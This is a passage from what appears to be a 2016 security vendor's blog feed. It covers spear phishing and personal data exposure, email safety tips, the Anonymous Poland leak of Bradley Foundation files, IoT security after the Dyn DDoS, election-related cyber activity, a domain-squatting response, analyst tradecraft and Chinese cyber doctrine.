    These are just some examples of the type of information available online for public consumption. And none of it was obtained from a data breach or other such intrusive attack. The information was willingly, voluntarily, and openly posted online on a variety of websites and searchable databases. It is often put there by you.

    Normally when we consider the exposure of sensitive information we think financial records or card payment data. This is certainly of concern, but also of interest is personally identifiable information (PII), sensitive data such as information about family and friends, and also what is considered “soft data” including details, such as hobbies and interests. The information usually accumulates over time, steadily building up a picture of the individual. You may think the exposure of this type of information is inconsequential, unavoidable, or even inevitable. But it can provide a wealth of opportunities to a threat actor.


    One such opportunity is spear phishing. It is an effective, and thus popular, tactic because the attackers use information relevant to the target to encourage them to open and interact with the malicious email. The more information there is available, the more the attacker has to work with. The email may address you by your full name and discuss a subject of interest to you, such as a holiday destination or a hobby. And although knowing your name and that you’re a tennis fan may not seem particularly dangerous, the repercussions of a CEO or finance officer or system administrator opening said email can be severe. Spear phishing has been associated with numerous cyber attacks in recent history, including attacks against retailers, healthcare, and government departments.

    Digital Shadows SearchLight™ monitors for an organization’s leaked assets online, including information pertaining to their VIPs. We can conduct focused research on an individual, looking at information that is both intentionally and unintentionally exposed. To achieve this we take an “attacker’s eye view” of the information publicly available, and then identify and assess the potential threats that information could pose to you and your company. This includes identifying the pivot points which connect at least two pieces of information together and attributes the information to the individual. The types of threats we seek to identify can include reputational damage, identify theft, impersonation, or even an attack (of either the cyber or physical variety).

    We’re not suggesting you lock yourself away, close all your accounts, and never go online again. But rather to be aware of what you share, because it may just be the opportunity a threat actor is looking for.

    Five Tips For Better Email Security Tue, 08 Nov 2016 08:49:50 +0000 While security is everyone’s responsibility, it’s not always easy to get right. Our “Security Best Practices” blog series will provide simple tips that enable users to improve their online security. These articles aren’t for pros, but for those trying to get their basics down.

    Even the most sophisticated cyber attacks can begin with a relatively simple email compromise. Only last week, we learned that attackers had crafted fake email invitations to deliver information stealing malware to guests attending a Palo Alto security conference in Indonesia. The attackers cleverly used screenshots of genuine conference invitations sent by Palo Alto to deceive the unsuspecting attendees.

    With this in mind, here are some of our simple tips to help make your email more secure, without the need to set up a private email server.

    1. Check your email sources

    Always check who the email came from. Attackers use many techniques to try and appear legitimate, such as using domain names which look almost identical to a genuine domain in order to trick you into visiting that site. This is known as typo-squatting – for example, www.go0gle[.]com might be used to direct users to malware. If it’s an address you’ve never seen before, try searching online for the email domain to see if it’s from a registered company.

    2. Don’t click on links

    Don’t directly click on links in an email. Instead, hover over the hyperlink and make sure the URL matches the page you actually want to visit. Attackers are becoming savvier, and they often hide fake URLs behind linked image buttons or text links, such as “click here”.

    3. Don’t open unsolicited attachments

    Files aren’t always what they appear to be. Malware or a virus could be masquerading itself as a seemingly benign text or image file. Now these types of emails aren’t always that easy to spot, and they won’t all be from a Nigerian prince claiming to hold the key to your long-lost second cousin, twice removed’s “peanut dust” fortune. Some might try and lure you by claiming to represent a legitimate company, such as a supplier, and will attach documents purporting to be invoices in the hope that you’ll take the bait.

     EmailSecurity Attachments

    Figure 2: Too good to be true? If in doubt, forward all such requests to Dragon’s Den

    When dealing with email attachments, be extra careful if asked to enable macros. Macros are bits of code embedded within documents. Though not always bad, they have historically been used to deliver malware. To help combat this, you should avoid enabling macros in email attachments, and ensure any built-in macro security features are always turned on.

    4. Use separate accounts and enable two-factor authentication

    We know it’s tempting to simply use one email account across all the online services you are active on, but in doing so you’re playing straight into the hands of an attacker. If someone manages to break into that account, then they can probably gain access to all other services using that address (especially if you use the same password). Consider having separate accounts for different activities: such as an account for work emails, one for personal use, and another one for sites which bombard you with marketing material.

    To top it all off, make sure you enable two factor authentication to make it harder for anyone trying to compromise these accounts.

    5. Limit how widely you share your email address

    Always think twice about what information you’re posting online. An exposed email on Facebook or a particular forum might be all the invitation someone needs to target you with phishing emails. As well as this, when you sign up for a service or post your email to a public site, your address can be copied or shared to be used by spammers.

    So if you have to share your email address publicly, try and avoid using emails which link to important services – such as Facebook or your online banking.

    Resilience: Adapt or Fail Fri, 28 Oct 2016 16:23:33 +0000 “But it ain’t how hard you hit; it’s about how hard you can get hit, and keep moving forward.”- Words made famous by a portrayal of resilience himself, Rocky Balboa.

    Without resilience, the internet probably wouldn’t have been created – if someone gave up every time their project went awry, the Internet of Things would be as foreign to us as teleportation. Luckily though, the trailblazers kept going and we are more connected electronically than ever before.

    Imagine then, if one day there was a massive glitch in the U.S. infrastructure and a national power outage occurred (or even more digital weapons released- remember Stuxnet)? Would you be able to get your work done? Would you be able to even cook or pick up your kids from school? How easily would we be able to bounce back from that, how easily would our systems be able to bounce back from that?

    Resilience is commonly defined as the ability of something or someone to spring back into shape and quickly recover from difficulties. I also like to think of it as how well we continue on, as resilience can be chipped away with time.

    The good news is, being resilient with systems and security is within our control. In fact, human behavior alone is both the core issue and solution surrounding cyber resilience of organizations.

    A former study that I conducted looked at the effects that the division of labor had on a company’s overall security. I found that physically dividing co-workers by department and teams has a negative impact on overall resilience as information was siloed. Seems pretty straight forward right? Well, the surprising part was, that even within teams, the understanding of security was skewed. There was no standard or base level knowledge that was required of anyone, and in fact, the employees themselves were the biggest threat to the company than anyone else.

    As the definition above states, being resilient means being able to snap back into action. The company studied wouldn’t have had enough knowledge between teams to have a unified crisis plan, to be able to regain stability after an unsavoury event.

    Organizational Resilience

    Contrasting this, an example of a highly resilient company, comes from a study a former professor of mine published. He had been observing stock traders in NYC for quite some time when 9/11 happened. After their office in NYC was shut down from the attacks, the trading company moved to a separate office in New Jersey, which hadn’t been utilized previously. The study found that after 9/11, when the employees were forced out of their office and halted their capabilities, they set up the office in NJ as similar as they could to their old one, and all had the mentality of gaining normality again after such horrendous events had happened. With their collective approach to just keep going, they restored their business function six months after the attack and didn’t lose a single employee in the process.

    Now, something important to point out is that in the stock trading world, you are used to chaos. There’s always a level of uncertainty and stress surrounding you. However, in regards to resilience, this is actually incredibly positive. The study found that having had a reasonable level of chaos on a daily basis, actually helped the traders bounce back, and all the more resilient they were.

    So how do we make sense of this? How do we get from the first company mentioned, who had very little to no resilient practices in place, to the second company who was able to overcome a tragic event?

    When an entire team has the same baseline knowledge, and are able to act and react both proactively and retroactively to security threats, is when a resilient system is then created. For if a system goes down and no one knows how to solve it, or if different people know different information that could solve it when pieced together but don’t, then there really is no hope.

    But what’s even more important, and sometimes overlooked, is having a diverse workforce. While working security knowledge and core values should be shared amongst teams, having different thought processes and backgrounds keeps ideas from going stagnant and lowers the possibility of group think.

    Think about antibiotic resistant bacteria, how these organisms have reshaped and changed based on new threats to them like antibiotics over centuries. The most resilient ones are the ones who were able to evolve with the ever changing environment, and not remain the same.

    When it comes to organizational resilience, we’re only as strong as our weakest link, therefore it’s up to companies to create a stronger security culture and general awareness of each other in order to become more resilient.

    Here are a few ideas on how you can build organizational resilience:

    • Treat everyone equally – have a base level of security knowledge everyone needs to know
    • Have drills – be able to respond under attack (phishing campaigns for one)
    • Have a diverse team and continuously challenge the process. Embrace new ways of looking at issues/topics. This starts in your recruitment, and is driven by your leadership teams.
    • Have backups – every organization should have a business continuity plan intact, but take this a step further, consider different locations you could work out of, how you could rebuild and what you would need/how you would communicate to your staff.
    • Accept that there are things that are so unknown, that you can’t prepare for them, and allow for mistakes to happen. Have transparency so that people aren’t afraid to discuss mistakes.
    • Always get back up. Keep trying. Challenge the process. When you have a resilient culture, everyone helps out and collaboration sky rockets.
    Anonymous Poland – Not Your Typical Hacktivist Group Fri, 28 Oct 2016 09:09:50 +0000 On October 29, 2016 a Twitter account associated with Anonymous Poland began to post tweets claiming to have compromised the network of the Bradley Foundation, a U.S. based charitable organization. This breach was confirmed by the Bradley Foundation on November 4, 2016. The tweets claimed that more than 100,000 files were obtained, purportedly the organization’s entire file back-up storage. Anonymous Poland posted a .rar file that consistent of 70,904 files totaling 42.8GB in size when uncompressed. The majority of the files in this dataset were email archive files and MS Office documents relating the Bradley Foundation’s business operations. Our examination of a selection of the documents indicated that some were created or edited by users with names that were found to be consistent with the Bradley Foundation’s current and former employees. Within these files, several documents were identified which contained personally identifiable information (PII) relating to the organization’s employees and donors. This included donor and employee contact information and employee W2 forms.

    What was most notable was the way that the threat actors attempted to get the word out. Between October 29 and 31, Digital Shadows detected more than 8,000 nearly identical tweets posted by 7,500 separate Twitter accounts. All of these tweets tagged another account, featured links to the Anonymous Poland twitter account, and had minor variations on the text shown in Figure 1.

    AnonPoland Tweet1

    Figure 1 – Example of one of over 5,000 nearly identical tweets

    Digital Shadows continued to detect low volumes of very similar tweets on November 1 and November 2, which featured links to emerging news coverage of this claimed breach. On November 3, 2016, Digital Shadows detected a substantial uptick in volume and identified 2,544 new tweets from 2,544 unique handles, all of which very closely resembled the message shown in Figure 2.

    AnonPoland Tweet2

    Figure 2 – Example of tweets mentioning attack against Bradley Foundation site

    Following this, on November 7 and 8, Digital Shadows detected a further dramatic uptick in volume of tweets, all of which closely resembled that shown in the image below. The graph below shows the days on which high volumes of tweets were detected and the number of associated unique handles. While many of the handles used in this campaign were registered years ago and featured content unrelated to this activity, some were newly registered and did not feature any other content.

     Bradley Foundation Tweets

    Figure 3. Number of near identical tweets publicizing the Bradley Foundation breach detected by SearchLight between October 29 and November 8, 2016.

    The available information on this breach and the subsequent activity identified on social media indicate that this was almost certainly a relatively complex, multi-stage operation. While the exact tactics, techniques and procedures used to conduct this breach were unknown; it likely would have required initial reconnaissance, a breach of the organization’s network and the exfiltration of the data. This element of the operation would likely also have been coordinated with efforts to register or compromise around 7,500 Twitter accounts in order to execute the next stage of the operation in which the breach was disclosed and publicized via social media. This indicates that Anonymous Poland was highly likely a well-organized group with experience of planning and executing operations atypical of commonly identified hacktivist groups.

    Previous research has speculated that Anonymous Poland, despite its use of Anonymous collective imagery and language, may be a legend being used by a Russian state actor to deniably leak information in service of influence operations.

    Although we have identified no definitive indications of a link between Anonymous Poland and Russia, it was assessed that some of the available information could be consistent with this hypothesis. The group has demonstrated a greater level of sophistication and competence than typically observed from hacktivist actors. Additionally, an examination of Anonymous Poland’s activity history indicated that the Twitter account used to disclose the Bradley Foundation breach has never been used to publicly post content on issues specifically relating to Poland. It was, however, used to leak documents purportedly obtained in a breach of the Ukrainian Ministry of Internal Affairs and data purportedly obtained in a breach of the World Anti-Doping Agency in Aug 2016, post a defacement of the U.S. Olympic team website and multiple denial of service attack claims against the Paralympics website in September 2016. This activity could be interpreted as consistent with Russian interests. We assessed that, while it was possible that Anonymous Poland was a sophisticated independent hacktivist group, it was also possible that the group may be a deniable false persona being used as part of a wider set of influence operations. However, we detected no evidence to confirm the identity or location of the individuals operating the Anonymous Poland Twitter account.

    Don’t Break the Internet, Fix Your Smart Devices Tue, 25 Oct 2016 10:30:58 +0000 The Distributed Denial of Service (DDoS) attack, which targeted DynDNS servers, and literally ‘broke the internet’ for several hours on October 21st, pushed an issue that has been plaguing security professionals since the dawn of the Internet of Things (IoT) into mainstream media.

    Typically DDoS attacks occur when infected personal computers or workstations form what is known as a botnet and overwhelm a server with an excess of traffic or requests. In this particular case however, servers belonging to a popular Domain Name System (DNS) company were hit.

    For some background, DNS functions like the internet’s iPhone contacts list. It translates domain names (your friends’ names), which are easy for humans to remember, into server IP addresses (their phone numbers) and allow networking devices (your phones) to communicate in order to ensure you end up at the appropriate destination. However, when DNS goes down, traffic loses its ability to travel to sites using this particular service.

    The DynDNS attack was completely different, however. This time the botnet did not consist of just workstations, but IoT devices, as well; and it occurred on a colossal scale due to the sheer number of devices that make up the IoT. This means that our fancy smart thermostats, baby monitors, home automation systems, and light bulbs could have theoretically contributed to this attack.

    Securing Smart Devices

    Going forward, if we want to prevent something like this from happening in the future, we need to be collectively more diligent about hardening IoT devices. So how do we do that exactly?

    Your smart devices live on your home network. Therefore, their security is completely dependent upon your network configurations. Check your networking devices’ manufacturer guidelines regarding admin panel control access. Typically this is achieved by simply typing (or a similar IP) into your browser. These panels offer an easy-to-understand Graphical User Interface (GUI) for users. In addition, default login credentials can easily be located online (herein lies a part of the problem…).

    Upon logging in, consider changing the device login credentials from the factory default. Ensure that your network is protected by Wi-Fi Protected Access II (WPA2) encryption and consider hiding your Service Set Identifier (SSID). This will prevent your network’s name from being visible to outsiders. Users will have to know it and manually type it and the password in to gain access.

    Device firmware can also be updated from these panels. Ensure that your device is running the latest version. Firmware updates are important because unlike software, firmware controls essential functions of the device hardware due to how it is configured. If there is an automatic update option, select this for peace of mind.

    In a similar fashion, IoT devices can also be updated from administrative panels. Check manufacturer guidelines for information on how to access these settings from your home network. Firmware and security updates should also be maintained on these devices.

    Many IoT devices also come with apps to control them. Maintain similar diligence with mobile security in order to prevent unwanted tampering. Create a strong master password for access to your device; ensure all devices and applications are fully patched and updated; turn off Bluetooth capabilities when not in use; never allow other applications to have full access to your mobile device; avoid rooting your mobile devices; ensure these devices are fully encrypted and avoid leaving them unattended.

    As the IoT grows, the threat of this type of attack will increase dramatically. Preventing the next IoT DDoS attack depends on all of us. So do your part to create a more robust home network and don’t be afraid to step up your security game!

    Rocking the Vote? The Effects of Cyber Activity On The U.S. Election Tue, 25 Oct 2016 09:22:27 +0000 Contrary to some media reporting, our latest research finds that cyber activity during the 2016 U.S. presidential election does not appear to have demonstrably altered events in the short-term.

    For this post, let’s leave aside hacktivism campaigns – such as OpTrump and OpKillary – that have been largely inconsequential (you can read the whitepaper for a detailed analysis). Instead, let’s look at the impact of the activities surrounding Guccifer 2.0, WikiLeaks and DC Leaks on public opinion.

    Of course, opinion polls are notoriously volatile, and any attempt to map out fluctuations in electoral support in line with cyber events using available polling data would need to be tentative. Moreover, opinion polls change on a day-to-day basis, and it would be very difficult to accurately quantify whether any increase or drop in support was a direct result of reporting on a cyber event, particularly as we do not know how widely or quickly such information would reach the voting public. Finally, there could be any one of a number of reasons for polling fluctuations, therefore trying to tie individual cyber events to changes in polling numbers would be speculative at best.

    Despite this, if we look at Clinton and Trump’s polling statistics over a broader period, certain trends emerge which may, in part, have been influenced by cyber events. The graph below presents polling statistics for Clinton and Trump since July 2015 (the area in blue below the line represents the percentage lead of either candidate). This indicates that Clinton experienced her most sustained period of low polling between mid-May and early August 2016.

    Figure 1: Clinton vs Trump polling data from July 2015 to the time of writing (Source:

    Perhaps coincidentally, the reported compromise of the DNC’s network, the emergence of Guccifer 2.0, the leaking of over 19,000 DNC documents by WikiLeaks, and the reported compromise of the DCCC network all occurred between June 14 and July 29 – the period in which Clinton polled the lowest in her entire campaign. The graph below shows an enhanced snapshot of this period, between late May 2016 and the time of writing, along with some of the major events to have occurred during that time.

    Figure 2: Clinton vs Trump polling data from May 2016 to the time of writing (Source:

    Clinton’s polling figures actually increased following reports of the DNC network compromise and the series of Guccifer 2.0 leaks, although her support then dropped in late June and remained low until early August 2016. Trump’s polling figures increased following reports of the DNC compromise, and rose steadily as the Guccifer 2.0 and WikiLeaks data leaks came to light. However, following an initial peak after becoming the official nominee for the Republican Party, Trump’s polling figures dropped dramatically.

    The polling numbers are far from conclusive, and there could be any number of reasons why support for Clinton remained relatively low throughout July. One potential factor may have been the increased media reporting of the cyber activity involving Guccifer 2.0, DC Leaks, WikiLeaks and the attacks on the DNC. Media reporting about the information included in the data leaks increased, and the Democratic Party experienced added public scrutiny in the lead up and during their party convention. Perhaps significantly, Clinton support dropped noticeably in the immediate aftermath of the public resignation of Debbie Wasserman Schultz on July 28, the chairperson for the DNC. The resignation of Schultz was a direct result of the DNC breach data hosted by WikiLeaks. Likewise, increased scrutiny on Clinton and the Democratic Party may have had a knock on effect on Trump’s polling figures, which appear to have steadily risen in line with the sustained spell of cyber activity. We can therefore make a tentative assessment that the combination of cyber events that occurred between mid-May and late July may have had a cumulative effect on the opinion polls, if only for a temporary period. These assumptions, however, cannot be confirmed.

    Regardless, it’s clear that any potential impact of this flurry of cyber activity was short-lived. Following her official nomination, Clinton’s polling numbers increased to pre-May levels – prior to the reported DNC compromise and the subsequent data leaks – and have remained relatively constant since then. Trump, on the other hand, experienced a major drop in support following his official nomination. There are, therefore, limits to any analysis that looks at how significant cyber activity has been in terms of voting patterns. In order to assess this further, respondents would need to be asked specific questions about why they favored a particular candidate over another at a specific time. Future analyses of the impact of cyber activity on elections would, therefore, benefit from having such polling data to draw on.

    While recent activity may not have rocked the vote towards a particular candidate, it’s also important to consider the public’s declining confidence in the electoral system. As voters’ faith in the electoral system diminishes, there is a chance that voter turnout could be suppressed – a sentiment that may well be exasperated following Friday’s large-scale DDoS attack on Dyn.

    Targeting of Elections; Old News, Fresh Tactics Tue, 25 Oct 2016 09:18:41 +0000 There has been no shortage of media coverage surrounding U.S. election and the associated nefarious cyber activity. Amid all this noise and rhetoric, our whitepaper summarizes what’s happened so far and the impact this has had on the election. But how unique is it for operations to be launched against elections?

    Ballot Box US Elections

    In April 2016, a South American hacker revealed his involvement in a covert campaign to swing the 2012 presidential election in Mexico. According to an interview, the hacker, Andrés Sepúlveda, was involved in rigging presidential elections in Nicaragua, Panama, Honduras, El Salvador, Colombia, Mexico, Costa Rica, Guatemala, and Venezuela. Following payment through middlemen, Sepúlveda and his team would manage thousands of fake profiles on social media in order to shape the discussion around political topics and even hack the cellphones and emails of candidates.

    In fact, the targeting of elections is far from unique. Nation states have been involved in multiple instances in the past. In 2013, media reports revealed that Chinese government hackers gained access to the computer networks of Sens. Barack Obama and John McCain during the 2008 presidential election. The hackers sought to export a large quantity of data, such as position papers and private emails, from both candidates. Campaign staffers at the time said that they grew suspicious that they were being monitored after Chinese officials approached them to complain about foreign policy positions written in secret, internal documents that had not yet been publicized. According to media reports, it appeared that the Chinese had penetrated the campaign networks to observe how the candidates’ policies on China were being developed.

    This episode represents a more conventional intelligence collection operation, where nation state actors would more likely be interested in sensitive data that would provide a strategic advantage or allow for future planning measures. An additional motivation would be “entrenchment” and the continuation of undetected access to their target’s systems in order to maintain their strategic viewpoint. We assess it to be highly likely that similar operations targeting the current U.S. election are ongoing along with the current campaigns that involve the disclosure of public information.

    However, this election cycle appears to have revealed a variation of this model. The United States Intelligence Community and a number of security vendors and commentators have tied leaks originating from WikiLeaks, Guccifer 2.0, and DC Leaks to Russian state-sponsored actors, though this assessment remains unconfirmed. If the allegations of Russian Government involvement are true, this would be an unprecedented effort on the part of a nation state to disrupt a U.S. election through network penetration and public data leaks. Rather than being interested in the policy documents maintained in the servers of the Democratic National Congress (DNC) and Democratic Congressional Campaign Committee (DCCC), these unspecified Russian cyber actors appear to believe that the data has more value as a public disclosure. The motivation for doing so is unclear, though it may represent an effort to influence public opinion or discredit a particular candidate. Conversely, it could simply be an overt display of an actor’s power and capability and a way for them to project power onto the world stage. In spite of that, the exact nature of the operation and its ultimate objectives remain unknown.

    There are, of course, many differences between the Sepúlveda’s operation and the current campaign targeting the U.S. Democratic Party. While the former was kept covert to protect the integrity of the targeted election, the latter has been largely overt and had relied on media attention to generate negative publicity.

    It is likely that cyber operations targeting either elections in general or candidates specifically, will continue. Irrespective of whether these operations will be covert or overt, it is fair to expect that future elections will be similarly impacted – and not just in the United States.

    Squashing Domain Squatting Mon, 24 Oct 2016 17:18:10 +0000 Digital Shadows was recently the victim of a domain squat attempt. As we eat our own dog food, we thankfully caught and remediated it quickly. What does it mean and how did we do it?  Read on, dear reader!

    What is Domain Squatting?

    Domain Squatting, also known as cybersquatting, is the practice of actors registering and using domains which impersonate companies, organizations, brands or even people without having the right to do so. Similarly, typosquatting is registering a misspelled variant of the domain.

    These types of squats can have many purposes, such as web traffic diversion for advertising revenue or defamation, re-selling the domain to the rightful owner at an inflated price, phishing visitors’ details, attacking visitors using exploit kits, or sending nefarious emails to company clients or employees.

    With over 1,500 registered top-level domains (TLD), and an even larger amount of possible misspellings, it is no longer feasible to protect yourself by buying up digital real estate. Trying to do so for even one brand name would be extremely expensive, process intensive and would likely still not fully protect an organization from this threat. As an alternative, organizations should proactively monitor for such domains being registered and have a defined process of dealing with infringements when they occur.

    What happened?

    Digital Shadows alert typosquat

    Figure 1: Internal alert sent by our analyst team

    As well as offering our domain squat monitoring capability to our clients, we use the same coverage for our own assets. On October 6, as part of the regular service, one of our analysts spotted a domain called The site included an html frame containing the domain, which in turn filled the entirety of the page, so the site exactly replicated the legitimate Digital Shadows site. Upon further research, we discovered that the site had been registered a day earlier via a privacy-preserving WHOIS registration and also had an MX (mail exchange) record, which meant it could have been used to send email. There were some issues with the site as well, such as incorrect content rendering and SSL certificate failures.

    What did we do?

    After the alert was sent to our internal security team (figure 1), further investigation was conducted regarding the threat emanating from the domain. The team was looking to answer the following questions:

    • Does the site host malicious content?
    • Could it have already been used to defraud our customers or staff?
    • What is the site doing/what is its purpose?
    • How do we remediate the problem?

    As a result of the research, it appeared that the site was not hosting malicious content at the time and likely had no means of obtaining any information that may have been input by visitors. The html code was mostly made up of the frame to our legitimate site. It is also possible the site served malicious content selectively, e.g. only target visitors from certain IP addresses.

    Since the domain didn’t appear to create advertisement revenue or steal credentials, one of the other possible malicious uses of the site could have been sending phishing emails to our clients or staff. Since this site had a registered MX record, this was indeed possible. The domain was checked against various phishing and spam databases; however, we were unable to identify why the site was created.

    Within two working days, three mitigating actions were taken:

    1. To limit risk, we notified our clients with a reminder of the only registered domains that Digital Shadows conducts operations on;

    a. We submitted a takedown request to the domain registrar and hosting provider based on a trademark infringement.

    2. A complaint to the domain registrar should be the first form of content takedown attempted. For other options, see the Uniform Domain-Name Dispute-Resolution Policy (UDRP) operated by ICANN; abuse complaints may be registered at a number of levels including WebHost, ISP and domain registrar.

    3. We submitted a web app firewall request to block referrers from the domain. This prevented the site from abstracting the iframe content from our legitimate site at and therefore rendered the framed site inoperable.


    Following the abuse notice, the initial registrant of the cyber squatted domain appears to have returned the domain to the registrar. No phishing emails were reported and we could consider this particular incident closed.

    However, it was not completely straightforward. A response from the registrar revealed that the domain had been registered using a URL forwarding service. This meant that while one endpoint address was specified in the registrar record, the actual hosting server was elsewhere and the details of it could only be obtained via a court order, which would require significant time and financial investment. This added complication is commonly used as an additional layer of protection, separating the attacker from the site.

    A motivated attacker could cause serious damage, which illustrates the fragility of all organizations to this type of attack. It is, therefore, very important to be prepared.


    In order to defend against domain squatting threats, every organization should:

    1. Monitor for domain registrations

    We found out about this domain’s existence very soon after its registration, which allowed us to act promptly before serious damage could be inflicted. If you don’t monitor for registrations of this kind, they will catch you off guard.

    2. Have a clearly defined incident escalation process

    Your teams need to know the correct path of escalation as well as people in change of the response. Furthermore, have a single point of reference for coordinating actions taken on these incidents.

    3. Have a clearly defined incident response policy

    Responsible parties should be aware of the actions that need to be carried out to investigate and remediate the problem.

    4. Trademark your assets

    There are a number of legal issues surrounding takedown requests. For example, DMCA requests can’t always be issued as they relate to copyright issues instead of trademark issues. You need to have a registered trademark of your brand name (or other assets) to be able to request a trademark infringement takedown.

    5. Inform appropriate staff, clients and suppliers

    Share the intelligence with those who need to know. By informing your employees, client base and relevant third party suppliers and peers, you can further mitigate possible phishing attempts and also help to increase their awareness of these attack types.

    Combatting Online Crime With “Needle-Rich Haystacks” Tue, 18 Oct 2016 14:09:41 +0000 At Digital Shadows our analyst team is responsible for providing both tactical situational awareness and broader, strategic awareness to our clients through incident reports, intelligence summaries and specific reports. The intelligence our analysts produce is largely based on automated collection from our wide range of sources across the visible, dark and deep Internet, so a key challenge is to identify true positives and to objectively assess the available data to draw analytically supportable conclusions.

    We use a range of machine based techniques to sift through data points identified through automated scans, including rules based keyword matching, regex based searches and highly targeted queries for specific entities, such as credit card numbers featuring the Bank Identification Number of a client institution. The objective is to create “needle-rich haystacks” in order to maximize our true positive to false positive ratio. Our analysts then sift this data for potential indications of data leakage, brand damaging content and both cyber and physical threats to our clients and write incident alerts to provide real-time awareness of a client’s digital shadow and any potential threats they may face. This can sometimes be a much tougher task than it sounds as the team is frequently presented with very large numbers of data points that need to be assessed (the Internet is a pretty big place), but our analyst team continuously liaises with a specialist intelligence collections team to maintain the best possible ratio of signal to noise.

    For the analyst team, finding a true positive is only half the challenge – analysts must then assess the available information to determine the nature and extent of the threat and how it could be best mitigated. Not only does this require a team with fluency in many languages, but it also requires the use of a wide range of structured analytical techniques. These include Strengths, Weaknesses, Opportunities, Threats (SWOT) analysis, Analysis of Competing Hypotheses (ACH) and Redhat analysis, to facilitate objective assessments and to ensure that every conclusion we draw is analytically sound and supported by the available evidence. We express these assessments precisely through the use of the Language of Uncertainty and source grading to ensure that our findings are clearly, concisely and accurately conveyed to our clients. In addition to these tradecraft techniques, we also use a range of specialist tools to streamline the analytical process and enable our team to dig deeper into each data point to ensure that nothing is missed. Our analysts receive training in analytical tradecraft, the use of specialist tools and the technical aspects of information security to ensure that they are equipped to handle the analytical challenges they face.


    Our assessments are supported by a curated intelligence base of profiles and incident records for prominent threat actors, tactics, techniques and procedures (TTPs), criminal websites, threat actor operations and ongoing events. These profiles inform analyst decisions when assessing the severity or nature of a threat and enable our analyst team to remain familiar with the ever-changing cyber threat landscape.

    Working on the Digital Shadows analyst team is challenging and requires a range of skills, including analytical tradecraft, technical awareness and a keen eye for detail, but it is consistently engaging, rewarding and enjoyable, as we constantly encounter new situations and must adapt our existing capabilities to new analytical problems in order to continually provide our clients with situational awareness of the threats they face every day.

    We’re always looking for talented individuals to join our growing team; check out our careers page to find out more.

    4 Tricks to Make a Cybersecurity Training a Treat Wed, 12 Oct 2016 08:53:41 +0000 A Halloween nightmare:

    Thunderstorms rage outside. Calendar alerts shriek in unison throughout the room as suspicion and anxiety rises. Lightning crashes. Users stare at their screens in horror as the dreaded “Security Training” invite rears its ugly head once again. “Say it isn’t so,” says the Head of HR. “It just can’t be… Already?” comes from someone hiding under a table in the Marketing department. “Please not again!” screams the Sales Manager as she flips her desk and runs away.

    Don’t let this scary tale become a reality at your company.

    To a security professional, it can often be shocking that people working in other fields aren’t quite as excited about this topic as us. We often think to ourselves, “But it’s so important. Why don’t they realize?” Just because this is our passion, does not mean that this is the case for everyone; but at the same time, this does not negate its importance.

    So how do we approach users without smothering them with information or seeming a little too… overly attached? Here are a few tips!

    Security needs to be:

    1. Palatable.

    Instead of handing over countless pages of security policies and expecting users to read them (nobody will read them), find ways to make this easier for users to consume.

    Converting your security policy into a fun, internally facing video is one way to keep users engaged without realizing that they’re learning. It’s sort of like hiding spinach in a strawberry banana smoothie.

    Encourage users to get involved in the production of the video. Feel free to make it amusing, while still conveying important concepts. Props like Guy Fawkes masks or ridiculous hacker costumes (think: ski mask ‘hacking’ with two keyboards) can make this TL;DR version of your security policy go a long way.

    2. Engaging.

    Training sessions can be a snooze for users. Spice them up by making them not only interactive, but actually interesting! How, you say?

    Take your users on an interactive adventure. Why not let them try out password cracking tools like John the Ripper or Cain and Abel first hand? Or have them send each other fake Flash update requests with BeEF on Kali Linux.

    This type of training can motivate users to want to protect themselves and the company and allows for them to get excited about security. It also helps them to understand the actual reason why they need to use strong passwords or exercise caution while browsing the internet.

    3. Rewarding.

    Compliment and reward your users on good security practice. “Wow, that’s a long password! I’ll bet that blows our complexity requirements out of the water!” Kind words can go a long way.

    4. Easygoing.

    Just be cool. Too much training can overwhelm users, even if it is fun. Constant workflow interruptions are inconsiderate and can result in your message falling on deaf ears. Mandatory trainings should occur no more than once or twice a year. Voluntary trainings can be hosted more frequently, however.

    As a security professional, you have the power to decide if your users are your strongest or your weakest link. Make training fun and engaging and don’t let this security nightmare become your reality.

    Digital Risk Monitoring Is A Service, Not a Distinct Capability Tue, 11 Oct 2016 11:10:19 +0000 Digital Shadows was recently recognized as a leader in the Forrester Wave on Digital Risk Monitoring. Digital risk monitoring is emerging as a must have capability that enables enterprises to better understand their digital footprints and the risks associated with them.

    When evaluating digital risk monitoring offerings it is important to avoid hyper focusing on individual capabilities.  How many point solutions does your organization possess today? Do you have more than twenty, more than thirty? Adding more discrete capabilities to your portfolio isn’t the answer. Instead of investing in a social media monitoring and brand protection solution, you should consider investing in a complete digital risk monitoring service.

    Digital Shadows SearchLight™ extends far beyond just brand protection or social media monitoring. SearchLight offers visibility into the digital risks associated with: data leakage, cyber threats, physical security, infrastructure exposure, social media monitoring as well as brand protection.

    Cyber situational awareness Types

    One of the advantages of leveraging a service with a wide breath of coverage is that you gain context across incident types. With this additional context, you can better understand the relationship across these incident types. For example, instead of looking at typo squats in insolation, you can better understand the campaign, infrastructure and adversary behind it.

    Balancing the Scales: The PRC’s Shift to Symmetrical Engagement Thu, 06 Oct 2016 10:10:08 +0000 Over the past few years we have observed the beginnings of a fundamental change in how People’s Republic of China (The PRC) engages with adversaries in the information warfare and cyberespionage domains. As is explained below, this has been characterized by a shift from asymmetrical to symmetrical engagement. As the PRC is widely perceived to be a major threat by many states and private companies in this domain, understanding the PRC’s changing doctrines of engagement is critical to maintaining situational awareness of the wider threat landscape.

    “A mouse toying with a cat” – Unrestricted Warfare as a concept

    In 1999 the Chinese People’s Liberation Army (PLA) published Unrestricted Warfare, a doctrinal guide for how the PLA, and the PRC as a whole, would engage with regional and international opponents. Unrestricted warfare advocated extending the concept of warfare to a range of non-conventional spheres – politics, law, and media, amongst others. At the core of this doctrine was the idea that the PRC could defeat a technologically and operationally superior adversary by engaging unconventional operations, more commonly known in Western military circles as asymmetric warfare. This doctrinal approach was adopted principally because at the time, the PRC lacked the capability to operate in any other way, particularly in the information warfare domain. A key principle of Unrestricted Warfare that underpinned PRC strategy was that large numbers of small scale asymmetric operations would cumulatively degrade an opponent and result in victory for the PRC.

    Addressing the strategic imbalance – away from the asymmetric

    However, in the last few years a significant change in doctrinal attitude has begun to occur. The 2013 iteration of the Science of Military Strategy, a PLA publication issued every 10-15 years which outlines planned strategic developments, emphasised technological, organizational and operational improvements in order to begin to approach parity with the US. Following this, in 2015 the PLA began its most significant reforms of the last 30 years with the institution of a process of wholescale organizational reform to restructure the force along more modern lines. A particularly notable change being the amalgamation of the PLA’s network warfare and cyberespionage units into a single entity – the Strategic Support Force (SSF).

    SSF emblem

    Figure 1 – Emblem of the SSF.

